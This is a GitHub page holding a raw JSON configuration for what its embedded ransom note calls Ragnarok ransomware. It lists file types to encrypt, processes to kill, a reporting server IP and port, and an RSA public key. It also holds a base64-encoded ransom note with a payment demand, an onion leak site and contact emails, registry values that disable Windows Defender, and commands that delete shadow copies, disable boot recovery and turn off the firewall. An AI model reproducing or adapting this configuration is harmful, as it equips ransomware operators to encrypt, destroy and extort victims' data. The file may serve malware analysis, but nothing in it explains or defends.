Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
/*
|~) /\ /~_|\ | /\ |~)/~\|/ |~) /\ |\ |(~/~\|\/|\ //\ |~)(~
|~\/~~\\_/| \|/~~\|~\\_/|\ |~\/~~\| \|_)\_/| | \/\//~~\|~\(_
*/
{
"calc":[
".doc",
".pdf",
".docx",
".xls",
".db",
".sql",
".mdf",
".ppt",
".pst"
],
"white":[
".exe",
".dll",
".sys",
".com",
".thor",
".lnk",
".tlb",
".olb",
".blf",
".cmd",
".lib",
".pdb",
".obj",
".bat",
".ini",
".msi",
".ocx",
".lock",
".386",
".ico",
".inf",
"mbr"
],
"ip":"94.237.109.49",
"port":9912,
"name":"!!Read_me_How_To_Recover_My_Files.html",
"ext":".thor",
"proc":[
"note*",
"powerpnt*",
"winword*",
"excel*",
"Exchange*",
"sql*",
"tomcat*",
"apache*",
"java*",
"python*",
"vee*",
"post*",
"mys*"
],
"content":"PCFET0NUWVBFIGh0bWw+PGgxPiNBTEwgWU9VUiBGSUxFUyBBUkUgRU5DUllQVEVEIEFORCBTVE9MRU4gQlkgUkFHTkFST0s8L2gxPkRlYXIgU2lyPGJyPjxicj5Zb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0E0MDk2IGFuZCBBRVMgZW5jcnlwdGlvbiBhbGdvcml0aG0uIDxicj5CdXQgZG9uJ3Qgd29ycnksIHlvdSBjYW4gcmV0dXJuIGFsbCB5b3VyIGZpbGVzISEgIGZvbGxvdyB0aGUgaW5zdHJ1Y3Rpb25zIHRvIHJlY292ZXIgeW91ciBmaWxlcyA8YnI+PGJyPkNvb3BlcmF0ZSB3aXRoIHVzIGFuZCBnZXQgdGhlIGRlY3J5cHRlciBwcm9ncmFtIGFzIHNvb24gYXMgcG9zc2libGUgd2lsbCBiZSB5b3VyIGJlc3Qgc29sdXRpb24uPGJyPk9ubHkgb3VyIHNvZnR3YXJlIGNhbiBkZWNyeXB0IGFsbCB5b3VyIGVuY3J5cHRlZCBmaWxlcy48YnI+PGJyPldoYXQgZ3VhcmFudGVlcyB5b3UgaGF2ZT88YnI+V2UgdGFrZSBvdXIgcmVwdXRhdGlvbiBzZXJpb3VzbHkuIFdlIHJlamVjdCBhbnkgZm9ybSBvZiBkZWNlcHRpb248L2JyPllvdSBjYW4gc2VuZCBvbmUgb2YgeW91ciBlbmNyeXB0ZWQgZmlsZSBmcm9tIHlvdXIgUEMgYW5kIHdlIGRlY3J5cHQgaXQgZm9yIGZyZWUuIDxicj5CdXQgd2UgY2FuIGRlY3J5cHQgb25seSAxIGZpbGUgZm9yIGZyZWUuIEZpbGUgbXVzdCBub3QgY29udGFpbiBhbnkgdmFsdWFibGUgaW5mb3JtYXRpb24uPGJyPkJhc2ljIHByaWNlIGZvciBwZXIgY29tcHV0ZXIgaXMgJDk4MC5EaXNjb3VudCA1MCUgYXZhaWxhYmxlIGlmIHlvdSBjb250YWN0IHVzIGluIDcyIGhvdXJzLCB0aGF0J3MgcHJpY2UgZm9yIHlvdSBpcyAkNDkwLjxicj5XaGVuIGhpcmluZyB0aGlyZC1wYXJ0eSBuZWdvdGlhdG9ycyBvciByZWNvdmVyeSBjb21wYW5pZXMuIGxpc3RlbiB0byB3aGF0IHRoZXkgdGVsbCB5b3UuIHRyeSB0byB0aGluay48YnI+IEFyZSB0aGV5IHJlYWxseSBpbnRlcmVzdGVkIGluIHNvbHZpbmcgeW91ciBwcm9ibGVtcyBvciBhcmUgdGhleSBqdXN0IHRoaW5raW5nIGFib3V0IHRoZWlyIHByb2ZpdCBhbmQgYW1iaXRpb25zPzxicj48YnI+QnkgdGhlIHdheS5XZSBoYXZlIHN0b2xlbiBsb3RzIG9mIHlvdXIgY29tcGFueSBhbmQgeW91ciBwcml2YXRlIGRhdGEgd2hpY2ggaW5jbHVkZXMgZG9jLHhscyxwZGYsanBnLG1kZixzcWwscHN0Li4uPGJyPkhlcmUgd2UgdXBsb2FkIHNhbXBsZSBmaWxlcyBvZiB5b3VyIGNvbXBhbnkgYW5kIHlvdXIgcHJpdmF0ZSBkYXRhIG9uIG91ciBibG9nIDo8YnI+aHR0cDovLzZzczV2dmRobW5oZnV4NnhvZXJ1bHp1dTczdXI1MnY2aGNtdmFpcGhvaGJ0Z3Z3Mm5uemZsbmlkLm9uaW9uPGJyPldlIHByb21pc2UgdGhhdCBpZiB5b3UgZG9uJ3QgcGF5IHdpdGhpbiBhIHdlZWssIHdlIHdpbGwgcGFja2FnZSBhbmQgcHVibGlzaCBhbGwgb2YgeW91ciBjb21wYW55IGFuZCB5b3VyIGRhdGEgb24gb3VyIHdlYnNpdGUuPGJyPldlIGFsc28gcHJvbWlzZSB3ZSBjYW4gZGVjcnlwdCBhbGwgb2YgeW91ciBkYXRhIGFuZCBkZWxldGUgYWxsIHlvdXIgZmlsZXMgb24gaW50ZXJuZXQgYWZ0ZXIgeW91ciBwYXltZW50Ljxicj5TdWNoIGxlYWtzIG9mIGluZm9ybWF0aW9uIGxlYWQgdG8gbG9zc2VzIGZvciB0aGUgY29tcGFueS4gZmluZXMgYW5kIGxhd3N1aXRzLiBBbmQgZG9uJ3QgZm9yZ2V0IHRoYXQgaW5mb3JtYXRpb24gY2FuIGZhbGwgaW50byB0aGUgaGFuZHMgb2YgY29tcGV0aXRvcnMhPGJyPkZvciB1cyB0aGlzIGlzIGp1c3QgYnVzaW5lc3MgYW5kIHRvIHByb3ZlIHRvIHlvdSBvdXIgc2VyaW91c25lc3MuPGJyPjxicj5PdXIgZS1tYWlsOjxicj4gcmFnbmFyMGtAdHV0YW5vdGEuY29tPGJyPjxicj4gUmVzZXJ2ZSBlLW1haWw6PGJyPnJhZ25hcm9rX3JlY292ZXJAc2VjbWFpbC5wcm8gPGJyPnIxOW5hcjBrQGFpcm1haWwuY2M8YnI+PGJyPkRldmljZSBJRDo8YnI+ICAg",
"rand":"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
"key":[
"SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",
"SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup",
"SOFTWARE\\Policies\\Microsoft\\Windows Defender",
"SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
],
"value":[
"DisableHomeGroup",
"DisableAntiSpyware",
"DisableRealtimeMonitoring",
"DisableBehaviorMonitoring",
"DisableOnAccessProtection",
"InstallLanguage"
],
"language":[
"0419",
"1049",
"2052",
"0480",
"0804",
"1152",
"0478",
"1144",
"0451",
"1105",
"040a",
"1034",
"042b",
"1067",
"042c",
"1068",
"082c",
"2092",
"0423",
"1059",
"0819",
"2073",
"043f",
"1087",
"0440",
"0428",
"1064",
"0443",
"1091",
"0442",
"1090",
"0422",
"1058",
"040d",
"1037"
],
"path":[
"content.ie5",
"\\temporary internet files",
"\\local settings\\temp",
"\\program files",
"\\progra~",
"\\windows",
"$",
"programdata",
"appdata",
"perflogs",
"all users",
"efi"
],
"full":[
"thumbs.db",
"ntldr",
"bootsect.bak",
"ntuser.dat",
"iconcache.db"
],
"default1":"\\*.*",
"default2":"%s\\%s",
"default3":"%s\\*.*",
"_N":"9D6EACD8D5897A5E02520E6E054D0F316A588337793B8604E36EC425F1B2ED08A516E5390EB99898292E6E3D187431BDCE14F62E04C9C28069FD10C811E82EA6C436E52420B68C4DF452D116D023143B85A01978C474AEC47F103442245256167571E44D14EBE2E5A3BC12C2F62B1CBD4E8875D0CFA103CAED42A2868D8FF2D3D604B92A4FD55C7BCBFE6D9838BA6AC80FF75EBECF49F81A9271A608817AC4908481B8BE34D914C00B9D5DB8F236A3D515108B238132D0ACD0809E0B171FCDF96DF897598A8FC5C94512920EEF7F2152BF6CEEB2DA9BFD22D357123BB6EC9CAA17E8A04325C1BE6AE021D674344638783326CE7FF7A9368CFFF8CD680FEFD8201F284420C37D754837321ADA1B3F5306B223EEE0A8F439849113F103D876F46E690AB658E08BD6F09A0E710F4ACC086951A0D09358AD8B5E1BD3B10B2421CD22952CB1E986BE9C611D16FB0E65A775C12E9B3195761BEF17CB9C58BEB86F71D5E51E6CE8CA12E5F699E6A5257537CE33B8AE3D9CEBD412F329596BE65F83EC294AC877C0DCB742897D1B5EB48147E61A0EF11699E8D898A78893E9657CB39247717B658FD933C3405E796B3CD10BA411CC4458BEE0B22F42DA50E65A8993AE553334B3D55A604DEB429945DB37052FEB24DC7D4E012E44FCCA4A8656F2ECB9DCA95E749F5E6953E2DA48EC3509039C1109E63F9B89D6BCE6AE0D5419BBDDA279",
"_E":"010001",
"sys64":"C:\\Windows\\SysWOW64",
"cmd_shadow":"cmd.exe /c vssadmin delete shadows /all /quiet",
"cmd_shadow1":"cmd.exe /c wmic shadowcopy delete /nointeractive",
"cmd_boot":"cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures",
"cmd_recovery":"cmd.exe /c bcdedit /set {current} recoveryenabled no",
"cmd_firewall":"cmd.exe /c netsh advfirewall set allprofiles state off",
"api":[
"Wow64DisableWow64FsRedirection",
"Wow64RevertWow64FsRedirection",
"RegOpenKeyExA",
"RegQueryValueExA",
"WNetOpenEnumW",
"GlobalAlloc",
"WNetEnumResourceW",
"FindFirstFileW",
"FindNextFileW",
"GlobalFree",
"WNetCloseEnum",
"RegCloseKey",
"CloseHandle",
"GetVersionExA",
"CreateProcessA",
"CryptAcquireContextA",
"CryptGenRandom",
"CryptReleaseContext",
"CreateFileA",
"GetFileSizeEx",
"GetLogicalDriveStringsW",
"Process32Next",
"Process32First",
"TerminateProcess",
"CreateToolhelp32Snapshot",
"OpenProcess",
"FreeSid",
"AllocateAndInitializeSid",
"CheckTokenMembership",
"CreateMutexA",
"WaitForSingleObject",
"ReleaseMutex",
"RegCreateKeyA",
"RegSetValueExA",
"GetComputerNameA",
"GetDriveTypeW",
"RmStartSession",
"RmRegisterResources",
"RmGetList",
"RmEndSession",
"WSAStartup",
"socket",
"bind",
"ntohs",
"connect",
"send",
"closesocket",
"WSACleanup",
"inet_addr",
"CreateThread",
"SystemParametersInfoA",
"ShellExecuteA",
"ExitProcess",
"GetFileAttributesA",
"CreateSemaphoreA",
"ReleaseSemaphore",
"GetSystemInfo",
"SetFileAttributesW",
"gethostname",
"gethostbyname",
"inet_ntoa"
],
"net":false,
"bg_name":"",
"bg":"",
"version":"4.1"
}